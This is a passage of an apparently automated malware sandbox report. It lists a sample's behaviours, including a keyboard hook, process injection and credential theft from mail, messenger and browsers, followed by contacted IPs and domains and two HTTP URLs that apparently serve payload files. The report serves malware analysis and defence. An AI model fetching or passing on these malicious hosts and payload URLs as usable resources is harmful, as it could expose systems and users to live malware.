another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 2 24->36         started        file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 34->88
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.237.87.161
 unknown unknown
133587 BGNR-AP2BainandCompanySG true
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
103.237.86.247
 unknown unknown
133587 BGNR-AP2BainandCompanySG false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
geoplugin.net 178.237.33.50 true
198.187.3.20.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
103.237.87.161 true
  • Avira URL Cloud: safe
 unknown
http://103.237.86.247/nsQUkTChtPKgp70.bin false
  • Avira URL Cloud: safe
 unknown
http://103.237.86.247/Daguerreotypiernes.fla false
  • Avira URL Cloud: safe
 unknown
http://geoplugin.net/json.gp false
  • URL Reputation: safe
 unknown